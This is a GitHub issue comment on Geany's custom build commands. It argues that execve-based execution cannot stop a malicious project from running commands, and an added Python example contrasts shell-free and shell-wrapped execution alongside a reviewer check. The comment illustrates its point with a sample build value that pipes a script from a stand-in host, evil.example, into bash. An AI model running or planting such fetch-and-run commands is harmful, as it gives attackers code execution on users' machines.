dolik-rce left a comment (geany/geany#4610)

Pardon my ignorance, but I don't understand how the recommended fix would help? 
Executing commands is what the "custom build commands" feature does. If it is 
implemented with `execve` the attacker still has the same opportunity to run 
anything, including `/bin/sh`.  They would just use `NF_00_CM=sh -c 'make; curl 
http://evil.example/payload.sh | bash'` instead (or hide the evil curl call in 
the makefile).

I think that there is no way to implement this "safely"; it is just as if you 
download a shell script, a Makefile, a Gradle project or literally anything that is 
*intended* to run commands - the user should always carefully inspect those 
before running them.

Aside from that, running multiple chained commands is a feature that I 
personally use in some projects. 

-- 
Reply to this email directly or view it on GitHub:
https://github.com/geany/geany/issues/4610#issuecomment-4829000152
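The point raised in the comment above, as an added example that is not part of the original comment and not Geany code: a command run exec-style (split into argv, no implicit shell) loses its `;` chaining, yet the same chain runs again as soon as the configured command names `sh -c` itself. The function names, the shell list and the harmless `echo` commands are assumptions made for this illustration; the reviewer helper only inspects the command string and cannot see what a Makefile it calls would do.

```python
import os
import shlex
import subprocess

# Hypothetical lists used only by this example.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
CHAIN_TOKENS = (";", "&&", "||", "|", "`", "$(")


def run_exec_style(command: str) -> str:
    """Run a configured command the way an execve-based runner would:
    split it into argv and start the program directly, with no shell."""
    argv = shlex.split(command)
    done = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, check=True)
    return done.stdout


def review_reasons(command: str) -> list[str]:
    """Return reasons a build command deserves a manual look before it
    is run. An empty list means nothing was flagged in the string itself."""
    reasons = []
    argv = shlex.split(command)
    if argv and os.path.basename(argv[0]) in SHELLS:
        reasons.append("invokes a shell interpreter")
    if any(token in command for token in CHAIN_TOKENS):
        reasons.append("contains shell chaining or substitution")
    return reasons


if __name__ == "__main__":
    # Constructed sample commands; echo stands in for real build steps.
    plain = "echo one; echo two"
    wrapped = "sh -c 'echo one; echo two'"

    # Without a shell, ';' is just text passed to the first program.
    print(repr(run_exec_style(plain)))
    # With an explicit 'sh -c', the chain is interpreted again.
    print(repr(run_exec_style(wrapped)))

    for cmd in ("make", plain, wrapped, "/bin/sh build.sh"):
        print(cmd, "->", review_reasons(cmd))
```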